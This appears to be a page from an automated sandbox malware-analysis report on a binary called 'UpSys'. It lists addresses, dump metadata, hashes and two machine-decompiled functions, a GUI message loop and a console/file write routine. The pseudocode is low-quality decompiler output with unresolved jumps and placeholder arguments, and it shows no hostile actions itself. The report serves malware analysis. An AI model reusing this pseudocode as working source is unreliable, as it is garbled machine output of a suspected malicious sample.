                                                                                                                                                              0x1400070a8
                                                                                                                                                              0x1400070b1
                                                                                                                                                              0x1400070ba
                                                                                                                                                              0x1400070c3
                                                                                                                                                              0x1400070c9
                                                                                                                                                              0x1400070d1
                                                                                                                                                              0x1400070d9
                                                                                                                                                              0x1400070e0
                                                                                                                                                              0x1400070f1
                                                                                                                                                              0x1400070fc
                                                                                                                                                              0x140007106
                                                                                                                                                              0x14000710b
                                                                                                                                                              0x140007116
                                                                                                                                                              0x140007124
                                                                                                                                                              0x140007127
                                                                                                                                                              0x14000712e
                                                                                                                                                              0x140007130
                                                                                                                                                              0x140007137
                                                                                                                                                              0x140007141
                                                                                                                                                              0x14000714a
                                                                                                                                                              0x140007153
                                                                                                                                                              0x14000715a
                                                                                                                                                              0x14000715e
                                                                                                                                                              0x140007164
                                                                                                                                                              0x14000716d
                                                                                                                                                              0x140007176
                                                                                                                                                              0x14000717f
                                                                                                                                                              0x140007188
                                                                                                                                                              0x140007191
                                                                                                                                                              0x140007198
                                                                                                                                                              0x14000719a
                                                                                                                                                              0x1400071ad
                                                                                                                                                              0x1400071bb
                                                                                                                                                              0x1400071d5

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Current_exceptionstd::exception_ptr::_$BuffCharClearParamUpperVariantmalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2641165101-0
                                                                                                                                                              • Opcode ID: a555397d59297f224287d044f934cb359817b8f00c65ff846e2ec0888ed4f2fc
                                                                                                                                                              • Instruction ID: 6617c935120c10d4940a13e10455c4e13bc7274424b7dc2c567eed5c73208fb3
                                                                                                                                                              • Opcode Fuzzy Hash: a555397d59297f224287d044f934cb359817b8f00c65ff846e2ec0888ed4f2fc
                                                                                                                                                              • Instruction Fuzzy Hash: 55238972209A8086EA66DF26E4807EE73A5F78DBC4F548116EB4E577B5DF39C890C700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400072E0 Relevance: 53.4, APIs: 26, Strings: 4, Instructions: 860windowsleeptimeCOMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 34%
                                                                                                                                                              			E000000011400072E0(signed long long __ebx, void* __ecx, signed int __edx, void* __ebp, long long __rbx, signed long long __rcx, long long __rsi, long long __rbp, void* __r9, void* __r10, void* __r11, long long __r12, long long __r13, char _a8, signed int _a16, char _a24, char _a32) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				void* _v232;
				long long _v328;
				intOrPtr _v336;
				char _v344;
				long long _v360;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t63;
				short _t68;
				void* _t78;
				void* _t85;
				void* _t87;
				void* _t97;
				void* _t122;
				long long _t123;
				signed long long _t130;
				intOrPtr* _t139;
				void* _t152;

				_t152 = __r11;
				_a16 = __edx;
				_t53 =  *((intOrPtr*)(__rcx + 0x1b8));
				_t139 = __rcx;
				if (_t53 - 0x76c >= 0) goto 0x4003a850;
				_t54 = _t53 + 1;
				 *((intOrPtr*)(__rcx + 0x1b8)) = _t54;
				if (_t54 == 1) goto 0x40007745;
				 *((char*)(__rcx + 0x238)) = 0;
				if ( *((char*)(__rcx + 0x1c8)) != 0) goto 0x400075d8;
				_v16 = __rbx;
				_v24 = __rbp;
				_v32 = __rsi;
				_v40 = __r12;
				_v48 = __r13;
				r13d = 0;
				if ( *((intOrPtr*)(__rcx + 0x238)) != r13b) goto 0x400075b0;
				if ( *0x400b5493 != r13b) goto 0x400073b3;
				_t78 =  *0x400c6a50 - r13b; // 0x0
				if (_t78 != 0) goto 0x4003a86f;
				r9d = 0;
				r8d = 0;
				_v360 = 1;
				if (PeekMessageW(??, ??, ??, ??, ??) != 0) goto 0x400076c0;
				if ( *0x400b5496 == 1) goto 0x4003a897;
				if ( *((intOrPtr*)(__rcx + 0x1c4)) == 1) goto 0x4000758e;
				if ( *0x400c7ed8 != r13d) goto 0x4003a8b4;
				if ( *0x400b549c == 1) goto 0x4003a994;
				if ( *((intOrPtr*)(__rcx + 0x7c8)) != r13d) goto 0x4003a9b2;
				_t85 =  *0x400c6a0c - r13b; // 0x0
				if (_t85 != 0) goto 0x4003ab40;
				if (E000000011400077D0() == 1) goto 0x400074be;
				_t87 =  *0x400c6c90 - r13b; // 0x0
				if (_t87 != 0) goto 0x4003ad4b;
				_t57 =  *((intOrPtr*)(__rcx + 0x1c4));
				if (_t57 == 7) goto 0x4003ae8d;
				if (_t57 == 2) goto 0x40007676;
				if (_t57 == 8) goto 0x4003b220;
				if (_t57 == 9) goto 0x4003b220;
				if (_t57 == 3) goto 0x40007676;
				if (_t57 == 4) goto 0x40007676;
				if (_t57 == 5) goto 0x40007676;
				if (_t57 == 6) goto 0x40007676;
				 *((intOrPtr*)(__rcx + 0x1c0)) = _t57;
				_a16 = _t57 + 1;
				if (__ecx -  *0x400c7f10 > 0) goto 0x4003b08a;
				_t97 = __ecx;
				if (_t97 <= 0) goto 0x4003b08a;
				_t122 = (_a16 << 5) +  *0x400c7f70;
				if (_t97 == 0) goto 0x4003b08a;
				_a32 = r13d;
				_t68 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t122 + 8)))) + 8));
				if (_t68 != 0) goto 0x400074d0;
				E00000001140005380(__rcx, _t122, __r12); // executed
				if ( *((intOrPtr*)(__rcx + 0x1c8)) == r13b) goto 0x40007350;
				goto 0x400075b0;
				if (_t68 != 0x34) goto 0x40007601;
				_t130 = __rcx;
				_v344 = r13d;
				_v360 =  &_a24;
				_v336 = 1;
				_v328 = __r13;
				_t60 = E00000001140006080(__ebx, __ebp, __rcx, _t122,  &_a32,  &_v344, __r10, _t152); // executed
				if (_t60 != 0) goto 0x4000752e;
				if ( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t122 + 8)) + _t130 * 8)) + 8)) != 0x7f) goto 0x4003afc4;
				_t123 = _v328;
				if (_t123 == 0) goto 0x40007558;
				 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18)))) =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18)))) - 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18)))) == r13d) goto 0x4003afe6;
				0x40016a60();
				_v328 = __r13;
				_t61 = _v336;
				if (_t61 == 8) goto 0x4003affd;
				if (_t61 == 0xa) goto 0x4003b022;
				if (_t61 == 5) goto 0x4003b040;
				if (_t61 == 0xb) goto 0x4003b050;
				if (_t61 != 0xc) goto 0x400074be;
				goto 0x4003b06c;
				r8d = 0;
				_a8 = r13d;
				E00000001140001EB0( *_t139, _t123,  *((intOrPtr*)( *_t139 + 4)) + _t139,  &_a8, __rsi);
				_t63 =  *((intOrPtr*)(_t139 + 0x1b8));
				 *((char*)(_t139 + 0x238)) = 0;
				if (_t63 == 1) goto 0x4000776f;
				 *((intOrPtr*)(_t139 + 0x1b8)) = _t63 - 1;
				return 0;
			}





























                                                                                                                                                              0x1400072e0
                                                                                                                                                              0x1400072e0
                                                                                                                                                              0x1400072ec
                                                                                                                                                              0x1400072f2
                                                                                                                                                              0x1400072fa
                                                                                                                                                              0x140007300
                                                                                                                                                              0x140007302
                                                                                                                                                              0x14000730b
                                                                                                                                                              0x140007318
                                                                                                                                                              0x14000731f
                                                                                                                                                              0x140007325
                                                                                                                                                              0x14000732d
                                                                                                                                                              0x140007335
                                                                                                                                                              0x14000733d
                                                                                                                                                              0x140007345
                                                                                                                                                              0x14000734d
                                                                                                                                                              0x140007357
                                                                                                                                                              0x140007364
                                                                                                                                                              0x140007366
                                                                                                                                                              0x14000736d
                                                                                                                                                              0x14000737b
                                                                                                                                                              0x14000737e
                                                                                                                                                              0x140007383
                                                                                                                                                              0x140007393
                                                                                                                                                              0x1400073a0
                                                                                                                                                              0x1400073ad
                                                                                                                                                              0x1400073ba
                                                                                                                                                              0x1400073c7
                                                                                                                                                              0x1400073d4
                                                                                                                                                              0x1400073da
                                                                                                                                                              0x1400073e1
                                                                                                                                                              0x1400073f1
                                                                                                                                                              0x1400073f7
                                                                                                                                                              0x1400073fe
                                                                                                                                                              0x140007404
                                                                                                                                                              0x14000740d
                                                                                                                                                              0x140007416
                                                                                                                                                              0x14000741f
                                                                                                                                                              0x140007428
                                                                                                                                                              0x140007431
                                                                                                                                                              0x14000743a
                                                                                                                                                              0x140007443
                                                                                                                                                              0x14000744c
                                                                                                                                                              0x14000745a
                                                                                                                                                              0x14000746b
                                                                                                                                                              0x140007472
                                                                                                                                                              0x140007478
                                                                                                                                                              0x14000747a
                                                                                                                                                              0x140007487
                                                                                                                                                              0x14000748e
                                                                                                                                                              0x140007498
                                                                                                                                                              0x1400074a3
                                                                                                                                                              0x1400074a9
                                                                                                                                                              0x1400074b9
                                                                                                                                                              0x1400074c5
                                                                                                                                                              0x1400074cb
                                                                                                                                                              0x1400074d3
                                                                                                                                                              0x1400074f1
                                                                                                                                                              0x1400074f4
                                                                                                                                                              0x1400074f9
                                                                                                                                                              0x1400074fe
                                                                                                                                                              0x140007506
                                                                                                                                                              0x14000750b
                                                                                                                                                              0x140007512
                                                                                                                                                              0x140007528
                                                                                                                                                              0x14000752e
                                                                                                                                                              0x140007536
                                                                                                                                                              0x14000753c
                                                                                                                                                              0x140007545
                                                                                                                                                              0x14000754e
                                                                                                                                                              0x140007553
                                                                                                                                                              0x140007558
                                                                                                                                                              0x14000755f
                                                                                                                                                              0x140007568
                                                                                                                                                              0x140007571
                                                                                                                                                              0x14000757a
                                                                                                                                                              0x140007583
                                                                                                                                                              0x140007589
                                                                                                                                                              0x140007599
                                                                                                                                                              0x1400075a0
                                                                                                                                                              0x1400075ab
                                                                                                                                                              0x1400075d8
                                                                                                                                                              0x1400075de
                                                                                                                                                              0x1400075e8
                                                                                                                                                              0x1400075f0
                                                                                                                                                              0x140007600

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$DispatchPeekTranslateWindow$Current_exceptionDestroyLockSleepTimeUpdatestd::exception_ptr::_time
                                                                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                              • API String ID: 2397503138-570651680
                                                                                                                                                              • Opcode ID: ff8dc3a7123ec8832d4ef8f9afd0c3ee2eb00ca349ba1f1c35e2ce21253c3888
                                                                                                                                                              • Instruction ID: 9b00aa8260d799c03860ce9cf5e4becdd49ea7d59a4aa6e1cf7dd5c5286ff9d6
                                                                                                                                                              • Opcode Fuzzy Hash: ff8dc3a7123ec8832d4ef8f9afd0c3ee2eb00ca349ba1f1c35e2ce21253c3888
                                                                                                                                                              • Instruction Fuzzy Hash: 6292A172608A8096EB66DB26E1907EE77A1F78D7C8F504011FB8E43AB5DB3DC554CB01
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014002241C Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODECrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                              			E0000000114002241C(void* __ebx, signed long long __ecx, signed int __esi, void* __rax, long long __rbx, void* __rcx, char* __rdx, void* __r8, void* __r11) {
				void* __rsi;
				void* __rbp;
				int _t188;
				int _t193;
				signed int _t196;
				char _t207;
				signed int _t214;
				signed int _t220;
				int _t224;
				int _t227;
				long _t228;
				void* _t234;
				signed int _t236;
				signed int _t237;
				char _t250;
				signed int _t283;
				void* _t285;
				signed int _t288;
				signed int _t290;
				signed long long _t360;
				signed long long _t361;
				intOrPtr _t364;
				signed int* _t371;
				signed int* _t386;
				signed long long _t388;
				intOrPtr* _t389;
				void* _t390;
				signed short* _t391;
				signed long long _t392;
				intOrPtr _t395;
				intOrPtr _t408;
				intOrPtr* _t417;
				char* _t427;
				intOrPtr _t430;
				int _t442;
				short* _t444;
				char* _t445;
				char* _t446;
				short* _t449;
				signed int* _t450;
				int _t454;
				intOrPtr* _t456;
				signed short* _t457;
				void* _t461;
				signed long long _t462;
				void* _t467;
				void* _t474;
				int _t476;
				char* _t477;
				void* _t479;
				void* _t481;
				signed long long _t483;
				signed long long _t485;
				void* _t489;
				signed long long _t491;

				_t475 = __r11;
				_t464 = __r8;
				_t427 = __rdx;
				_t283 = __esi;
				_t234 = __ebx;
				 *((long long*)(_t461 + 0x20)) = __rbx;
				E00000001140030CB0(0x1b30, __rax, _t474, __r11);
				_t462 = _t461 - __rax;
				_t360 =  *0x400aeaa0; // 0x91d4e6d097bc
				_t361 = _t360 ^ _t462;
				 *(_t462 + 0x1b20) = _t361;
				r13d = r8d;
				_t477 = __rdx;
				_t388 = __ecx;
				 *(_t462 + 0x40) = 0;
				if (r8d != 0) goto 0x40022468;
				goto 0x40022b4f;
				if (__rdx != 0) goto 0x4002249b;
				E0000000114001EB04(__rdx, _t361);
				 *_t361 =  *_t361 & 0;
				E0000000114001EAE4(__rdx, _t361);
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & _t442;
				r9d = 0;
				r8d = 0;
				 *_t361 = 0x16;
				E0000000114001EA14(_t361, __ecx, __rcx, __rdx, _t444, _t454, __r8, _t489, _t481);
				goto 0x40022b4f;
				_t483 = _t388 >> 5;
				r15d = r15d & 0x0000001f;
				_t395 =  *((intOrPtr*)(0x400c88c0 + _t483 * 8));
				 *(_t462 + 0x50) = _t483;
				_t491 = _t388 * 0x58;
				sil =  *(_t491 + _t395 + 0x38);
				sil = sil + sil;
				sil = sil >> 1;
				if (sil == 2) goto 0x400224d4;
				if (sil != 1) goto 0x400224dd;
				if (( !r13d & 0x00000001) == 0) goto 0x4002246d;
				if (( *(_t491 + _t395 + 8) & 0x00000020) == 0) goto 0x400224f2;
				_t17 = _t427 + 2; // 0x2
				r8d = _t17;
				E0000000114002A580(_t234, _t234, 0,  *(_t491 + _t395 + 8) & 0x00000020, 0x400c88c0, _t388, _t427, _t444, _t454, _t464);
				if (E0000000114002A7A4(_t234, 0x400c88c0, _t388, _t444, _t454, _t464) == 0) goto 0x400227f2;
				_t364 =  *((intOrPtr*)(0x400c88c0 + _t483 * 8));
				if (( *(_t491 + 0x1400c88c8) & 0x00000080) == 0) goto 0x400227f2;
				E0000000114001D6F0(_t234,  *(_t491 + 0x1400c88c8) & 0x00000080, _t364);
				_t236 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t364 + 0xc0)) + 0x14)) == 0x00000000;
				if (GetConsoleMode(_t479) == 0) goto 0x400227f2;
				if (_t236 == 0) goto 0x4002255b;
				if (sil == 0) goto 0x400227f2;
				_t188 = GetConsoleCP();
				 *(_t462 + 0x4c) =  *(_t462 + 0x4c) & 0;
				_t389 = _t477;
				 *(_t462 + 0x58) = _t188;
				if (r13d == 0) goto 0x400227ec;
				r14d =  *(_t462 + 0x58);
				if (sil != 0) goto 0x4002270b;
				_t250 =  *_t389;
				r14d = 0;
				_t430 =  *((intOrPtr*)(0x400c88c0 +  *(_t462 + 0x50) * 8));
				r14b = _t250 == 0xa;
				if ( *(_t491 + _t430 + 0x50) == 0) goto 0x400225cd;
				 *((char*)(_t462 + 0x5d)) = _t250;
				r8d = 2;
				 *((char*)(_t462 + 0x5c)) =  *((intOrPtr*)(_t491 + _t430 + 0x4c));
				 *(_t491 + _t430 + 0x50) =  *(_t491 + _t430 + 0x50) & 0x00000000;
				goto 0x40022616;
				if (E00000001140017824(_t250,  *(_t491 + _t430 + 0x50), 0x400c88c0, _t475) == 0) goto 0x4002260d;
				if (_t479 - _t389 + _t477 - 1 <= 0) goto 0x400227bb;
				r8d = 2;
				if (E0000000114002AB88(0, _t462 + 0x44, _t389, _t467, _t474, _t475) == 0xffffffff) goto 0x4002277e;
				_t390 = _t389 + 1;
				goto 0x40022629;
				r8d = 1;
				if (E0000000114002AB88(0, _t462 + 0x44, _t390, _t467, _t474, _t475) == 0xffffffff) goto 0x4002277e;
				 *(_t462 + 0x38) =  *(_t462 + 0x38) & 0x00000000;
				 *(_t462 + 0x30) =  *(_t462 + 0x30) & 0x00000000;
				r9d = 1;
				 *((intOrPtr*)(_t462 + 0x28)) = 5;
				_t391 = _t390 + 1;
				 *(_t462 + 0x20) = _t462 + 0x5c;
				_t193 = WideCharToMultiByte(_t476, _t442, _t444, _t454);
				_t288 = _t193;
				if (_t193 == 0) goto 0x4002277e;
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & 0x00000000;
				r8d = _t288;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x400227e2;
				if ( *(_t462 + 0x4c) - _t288 < 0) goto 0x4002277e;
				if (r14d == 0) goto 0x40022770;
				_t371 =  *(_t462 + 0x50);
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & 0x00000000;
				 *((intOrPtr*)(_t462 + 0x5c)) = bpl;
				r8d = 0x1400c88b4;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x400227e2;
				if ( *(_t462 + 0x4c) - 1 < 0) goto 0x4002277e;
				 *(_t462 + 0x40) =  *(_t462 + 0x40) + 1;
				goto 0x40022770;
				if (sil == 1) goto 0x40022717;
				if (sil != 2) goto 0x4002272e;
				_t196 =  *_t391 & 0x0000ffff;
				r14d = 0;
				 *(_t462 + 0x44) = _t196;
				r14b = _t196 == 0xa;
				_t392 =  &(_t391[1]);
				if (sil == 1) goto 0x4002273a;
				if (sil != 2) goto 0x40022770;
				if (E0000000114002C788( *(_t462 + 0x44) & 0x0000ffff) !=  *(_t462 + 0x44)) goto 0x400227e2;
				if (r14d == 0) goto 0x40022770;
				 *(_t462 + 0x44) = 0xd;
				if (E0000000114002C788(0xd) !=  *(_t462 + 0x44)) goto 0x400227e2;
				 *(_t462 + 0x40) =  *(_t462 + 0x40) + 1;
				if (_t236 - r12d - r13d < 0) goto 0x4002257f;
				_t237 =  *(_t462 + 0x4c);
				_t290 =  *(_t462 + 0x40);
				if (_t236 - r12d +  *(_t462 + 0x40) + 4 != 0) goto 0x40022b4b;
				if (_t237 == 0) goto 0x40022b15;
				if (_t237 != 5) goto 0x40022b09;
				E0000000114001EAE4(_t237 - 5, _t371);
				 *_t371 = 9;
				E0000000114001EB04(_t237 - 5, _t371);
				 *_t371 = _t237;
				goto 0x40022493;
				_t485 =  *(_t462 + 0x50);
				 *((char*)(_t491 +  *((intOrPtr*)(0x400c88c0 + _t485 * 8)) + 0x4c)) =  *_t392;
				 *(_t491 +  *((intOrPtr*)(0x400c88c0 + _t485 * 8)) + 0x50) = 1;
				goto 0x40022787;
				GetLastError();
				goto 0x40022782;
				goto 0x40022793;
				_t408 =  *((intOrPtr*)(0x400c88c0 + _t485 * 8));
				if (( *(_t491 + _t408 + 8) & 0x00000080) == 0) goto 0x40022ad3;
				_t456 = _t477;
				if (sil != 0) goto 0x400228e7;
				if (r13d == 0) goto 0x40022b1c;
				_t111 = _t392 + 0xd; // 0xd
				r14d =  *(_t462 + 0x40);
				_t445 = _t462 + 0x720;
				if (_t290 - r12d - r13d >= 0) goto 0x40022862;
				_t207 =  *_t456;
				_t457 = _t456 + 1;
				if (_t207 != 0xa) goto 0x40022851;
				 *_t445 = _t111;
				r14d = r14d + 1;
				_t446 = _t445 + 1;
				 *_t446 = _t207;
				if (_t408 + 2 - 0x13ff < 0) goto 0x40022832;
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & _t392;
				r8d = _t283;
				r8d = r8d - _t207;
				 *(_t462 + 0x40) = r14d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x400228da;
				if ( *((intOrPtr*)(_t462 + 0x48)) - _t446 + 1 - _t462 + 0x720 < 0) goto 0x40022787;
				if (_t290 - r12d - r13d < 0) goto 0x40022823;
				goto 0x40022787;
				GetLastError();
				goto 0x40022787;
				if (sil != 2) goto 0x400229c5;
				if (r13d == 0) goto 0x40022b1c;
				r14d =  *(_t462 + 0x40);
				_t449 = _t462 + 0x720;
				if (_t290 - r12d - r13d >= 0) goto 0x40022949;
				_t214 =  *_t457 & 0x0000ffff;
				if (_t214 != 0xa) goto 0x40022935;
				 *_t449 = 0xd;
				r14d = r14d + 2;
				_t450 = _t449 + 2;
				 *_t450 = _t214;
				if ( *((intOrPtr*)(_t491 +  *((intOrPtr*)(0x400c88c0 +  *(_t462 + 0x50) * 8)))) + 4 - 0x13fe < 0) goto 0x4002290e;
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & _t392;
				r8d = _t283;
				r8d = r8d - _t214;
				 *(_t462 + 0x40) = r14d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x400228da;
				if ( *((intOrPtr*)(_t462 + 0x48)) -  &(_t450[0]) - _t462 + 0x720 < 0) goto 0x40022787;
				if (_t290 - r12d - r13d < 0) goto 0x400228ff;
				goto 0x40022787;
				if (r13d == 0) goto 0x40022b1c;
				r8d = 0xd;
				_t417 = _t462 + 0x70;
				if (_t290 - r12d - r13d >= 0) goto 0x40022a13;
				_t220 = _t457[1] & 0x0000ffff;
				if (_t220 != 0xa) goto 0x400229ff;
				 *_t417 = r8w;
				 *(_t417 + 2) = _t220;
				if (_t462 + 0x724 - 0x6a8 < 0) goto 0x400229db;
				 *(_t462 + 0x38) =  *(_t462 + 0x38) & 0x00000000;
				 *(_t462 + 0x30) =  *(_t462 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t462 + 0x28)) = 0xd55;
				asm("cdq");
				r9d = 0 - _t220 >> 1;
				 *(_t462 + 0x20) = _t462 + 0x720;
				_t224 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t224;
				if (_t224 == 0) goto 0x400227e2;
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & 0x00000000;
				r8d = r14d;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x40022aa9;
				_t285 = 0 +  *((intOrPtr*)(_t462 + 0x48));
				if (r14d - _t285 > 0) goto 0x40022a64;
				goto 0x40022ab1;
				GetLastError();
				if (r14d - _t285 > 0) goto 0x40022782;
				r8d = 0xd;
				if (_t290 - r12d - r13d < 0) goto 0x400229d4;
				goto 0x40022782;
				 *(_t462 + 0x20) =  *(_t462 + 0x20) & _t442;
				r8d = r13d;
				_t227 = WriteFile(??, ??, ??, ??, ??); // executed
				if (_t227 == 0) goto 0x40022afc;
				goto 0x4002278b;
				_t228 = GetLastError();
				goto 0x4002278b;
				E0000000114001EB24(_t228, _t227,  *(_t462 + 0x50), _t462 + 0x70);
				goto 0x40022493;
				_t386 =  *((intOrPtr*)(0x400c88c0 +  *(_t462 + 0x50) * 8));
				if (( *(_t491 + 0x1400c88c8) & 0x00000040) == 0) goto 0x40022b33;
				if ( *_t477 == 0x1a) goto 0x40022461;
				E0000000114001EAE4( *_t477 - 0x1a, _t386);
				 *0x400c88c0 = 0x1c;
				E0000000114001EB04( *_t477 - 0x1a, _t386);
				 *_t386 =  *_t386 & 0x00000000;
				goto 0x40022493;
				return E00000001140028D30(_t228, _t392,  *(_t462 + 0x1b20) ^ _t462, _t462 + 0x48);
			}


























































                                                                                                                                                              0x14002241c
                                                                                                                                                              0x14002241c
                                                                                                                                                              0x14002241c
                                                                                                                                                              0x14002241c
                                                                                                                                                              0x14002241c
                                                                                                                                                              0x14002241c
                                                                                                                                                              0x140022431
                                                                                                                                                              0x140022436
                                                                                                                                                              0x140022439
                                                                                                                                                              0x140022440
                                                                                                                                                              0x140022443
                                                                                                                                                              0x14002244f
                                                                                                                                                              0x140022452
                                                                                                                                                              0x140022455
                                                                                                                                                              0x140022458
                                                                                                                                                              0x14002245f
                                                                                                                                                              0x140022463
                                                                                                                                                              0x14002246b
                                                                                                                                                              0x14002246d
                                                                                                                                                              0x140022472
                                                                                                                                                              0x140022474
                                                                                                                                                              0x140022479
                                                                                                                                                              0x14002247e
                                                                                                                                                              0x140022481
                                                                                                                                                              0x140022488
                                                                                                                                                              0x14002248e
                                                                                                                                                              0x140022496
                                                                                                                                                              0x1400224a8
                                                                                                                                                              0x1400224ac
                                                                                                                                                              0x1400224b0
                                                                                                                                                              0x1400224b4
                                                                                                                                                              0x1400224b9
                                                                                                                                                              0x1400224bd
                                                                                                                                                              0x1400224c2
                                                                                                                                                              0x1400224c5
                                                                                                                                                              0x1400224cc
                                                                                                                                                              0x1400224d2
                                                                                                                                                              0x1400224db
                                                                                                                                                              0x1400224e3
                                                                                                                                                              0x1400224e9
                                                                                                                                                              0x1400224e9
                                                                                                                                                              0x1400224ed
                                                                                                                                                              0x1400224fb
                                                                                                                                                              0x140022508
                                                                                                                                                              0x140022512
                                                                                                                                                              0x140022518
                                                                                                                                                              0x14002253d
                                                                                                                                                              0x140022548
                                                                                                                                                              0x140022550
                                                                                                                                                              0x140022555
                                                                                                                                                              0x14002255b
                                                                                                                                                              0x140022561
                                                                                                                                                              0x140022565
                                                                                                                                                              0x140022568
                                                                                                                                                              0x14002256f
                                                                                                                                                              0x140022575
                                                                                                                                                              0x140022582
                                                                                                                                                              0x14002258d
                                                                                                                                                              0x14002258f
                                                                                                                                                              0x14002259c
                                                                                                                                                              0x1400225a1
                                                                                                                                                              0x1400225ab
                                                                                                                                                              0x1400225b2
                                                                                                                                                              0x1400225b6
                                                                                                                                                              0x1400225bc
                                                                                                                                                              0x1400225c0
                                                                                                                                                              0x1400225cb
                                                                                                                                                              0x1400225d7
                                                                                                                                                              0x1400225e6
                                                                                                                                                              0x1400225f1
                                                                                                                                                              0x140022602
                                                                                                                                                              0x140022608
                                                                                                                                                              0x14002260b
                                                                                                                                                              0x14002260d
                                                                                                                                                              0x140022623
                                                                                                                                                              0x140022629
                                                                                                                                                              0x14002262f
                                                                                                                                                              0x140022643
                                                                                                                                                              0x14002264b
                                                                                                                                                              0x140022653
                                                                                                                                                              0x140022656
                                                                                                                                                              0x14002265b
                                                                                                                                                              0x140022661
                                                                                                                                                              0x140022665
                                                                                                                                                              0x140022670
                                                                                                                                                              0x14002268f
                                                                                                                                                              0x14002269a
                                                                                                                                                              0x1400226ad
                                                                                                                                                              0x1400226bb
                                                                                                                                                              0x1400226c1
                                                                                                                                                              0x1400226c6
                                                                                                                                                              0x1400226cc
                                                                                                                                                              0x1400226dd
                                                                                                                                                              0x1400226f6
                                                                                                                                                              0x140022701
                                                                                                                                                              0x140022703
                                                                                                                                                              0x140022709
                                                                                                                                                              0x14002270f
                                                                                                                                                              0x140022715
                                                                                                                                                              0x140022717
                                                                                                                                                              0x14002271a
                                                                                                                                                              0x140022721
                                                                                                                                                              0x140022726
                                                                                                                                                              0x14002272a
                                                                                                                                                              0x140022732
                                                                                                                                                              0x140022738
                                                                                                                                                              0x140022749
                                                                                                                                                              0x140022755
                                                                                                                                                              0x140022759
                                                                                                                                                              0x140022768
                                                                                                                                                              0x14002276c
                                                                                                                                                              0x140022778
                                                                                                                                                              0x14002277e
                                                                                                                                                              0x140022787
                                                                                                                                                              0x14002278d
                                                                                                                                                              0x140022795
                                                                                                                                                              0x14002279e
